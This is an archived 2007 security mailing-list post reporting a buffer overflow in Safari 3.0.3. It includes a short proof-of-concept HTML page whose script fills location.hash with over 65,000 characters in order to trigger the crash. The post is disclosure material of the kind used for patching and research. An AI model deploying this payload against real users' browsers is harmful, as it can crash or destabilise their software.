|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Safari 3.0.3 (522.15.5) Buffer overflow
azizov
itdefence.ru
Date: Fri Sep 07 2007 - 11:28:06 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Azizov E. (azizov
itdefence.ru)
1. At processing of data, which has more than 65474 bytes in size, occurs buffer overflow.
POC:
<html>
<body>
<script>
var maxbuf = 65474;
buff = "A";
for (i=0;i<maxbuf;i++) { buff = buff+"A"; }
document.location.hash = buff+"BOW! ";
alert(document.location.hash);
</script>
</body>
</html>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]